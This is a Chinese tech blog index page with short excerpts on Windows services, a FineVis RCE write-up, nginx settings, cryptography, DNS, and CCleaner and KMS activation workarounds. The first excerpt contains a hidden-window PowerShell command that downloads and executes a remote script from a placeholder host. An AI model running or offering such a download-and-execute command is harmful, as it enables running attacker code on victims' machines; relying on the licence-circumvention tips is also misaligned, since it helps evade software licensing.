2024-11-10 厉飞雨 阅读(21) 评论(0) 赞(3)

最基础的就是windows自带服务 例如RDP。telnet。等等 之后再比如powershell： ```lang-powershell powershell.exe -nop -whidden -c IEX ((new-objectnet.webclient).downloadstring('http://x.x.x.x:81/aa')) ``` ...

2024-11-10 厉飞雨 阅读(26) 评论(0) 赞(2)

写在前面 {#写在前面} ============ 之前上一篇文章中[浅析帆软FineVis默认插件前台RCE](https://51tbox.com/)提到jasper依赖没被加载，当时只是简单做了测试，没有具体看为什么jsp未被解析，只是疑惑了下tomcat下jspservlet配置明明正确配置页面却直接返回空(没有考虑到编译报错这一层问题)，今天无意间看到星球有师傅分享...

2024-11-10 厉飞雨 阅读(27) 评论(0) 赞(4)

记录一下，这样操作的目的是方便再某个文件夹下直接打开运行cmd 解决了cd 的问题，而且对比发现，cmd 比gitBash或者编译器自带的shell或者Terminal 工具运行速度好很多。） 法一：新建文件，将以下内容保存成reg文件，如addCMD.reg，双击该文件自动导入设置 Windows Registry Editor Version 5.00 ...

2024-11-10 厉飞雨 阅读(19) 评论(0) 赞(4)

博主曾经推荐大家使用 `CCleaner`来自动清理系统垃圾，并且提供了一枚激活码，你懂的。[传送门](https://www.v2ex.cc/129.html) 但是从2018年开始 `CCleaner`开始频繁更新，频繁程度甚至超过了 `Chrome浏览器`，更新虽然让功能更强大，软件更好用，但是也修补了那个激活码的漏洞，激活之后不知不觉就失效了，博主也未能幸免。 ...

2024-11-10 厉飞雨 阅读(34) 评论(0) 赞(4)

本文基于宝塔面板测试，其他环境请自行调式，所有设置改动之前请先备份好原文件。 禁止ip直接访问主机的目的是为了避免其他人把未备案的域名解析到自己的服务器IP，而导致服务器被断网，我们可以通过禁止使用ip访问的方法，防止此类事情的发生。 解决方法： 本文介绍修改配置文件nginx.conf两种方法： 1.在server段里插入如下正则： -----------------...

2024-11-10 厉飞雨 阅读(17) 评论(0) 赞(3)

大家都知道，什么数字卫士，什么管家，各种全家桶，非常的占用电脑资源，有很多人就不想用这类软件了，最近 Windows10 吧有很多人都在问这个问题，裸奔我的电脑到底会不会有什么风险，花里胡哨的狗儿可以很明确地回答你，不会。 在用 Win10 的同学都知道，Win10 自带 Windows Defender 这个程序，这个程序已经可以防御大部分的病毒，而且，你不去浏览那些花里...

2024-11-10 厉飞雨 阅读(36) 评论(0) 赞(2)

> 本文主要翻译自 [Practical-Cryptography-for-Developers-Book](https://github.com/nakov/Practical-Cryptography-for-Developers-Book)，笔者补充了 HMAC 的 Python 实现以及 scrypt 使用示例。 一、MAC 消息认证码 {#一mac-消息认证码...

2024-11-10 厉飞雨 阅读(25) 评论(0) 赞(2)

0x1 写在前面 -------- 今儿一早，一个大佬在我们主题群里发了一个好玩儿的音乐盒子，可以播放和下载几乎全网所有Music，本着好奇害死猫的心态玩一玩，于是就有了这篇文章。 1. 找到大佬博客 2. 下载大佬写好的代码 3. 建立子目录 4. 上传并解压代码到子目录 5. 输入域名/子目录 ![没有斜杠.jpg](http://static.51tbox.com/...

2024-11-10 厉飞雨 阅读(26) 评论(0) 赞(2)

网上似乎没有针对这个操作做出明确的说明。其实操作很简单，只要在正向查找区域中右键添加`CNAME`记录并输入别名，比如下图中的别名为`www`，然后在`目标主机的完全合格的域名(FQDN)`中输入别名（CNAME）的指向地址即可。 如下图： ![CNAME.jpg](http://static.51tbox.com/static/2024-11-09/col/0d1c0...

2024-11-10 厉飞雨 阅读(42) 评论(0) 赞(3)

首先 (Shǒu xiān) 祝大家圣诞快乐 (zhù dà jiā shèng dàn kuài lè) ，平安喜乐 (píng ān xǐ lè) ！ KMS命令激活WINDOWS -------------- 1、使用这种方式激活必须确认你安装的是`VL批量版本`并且没有`手动安装过任何key` ```lang-bash slmgr /skms kms.v2ex.c...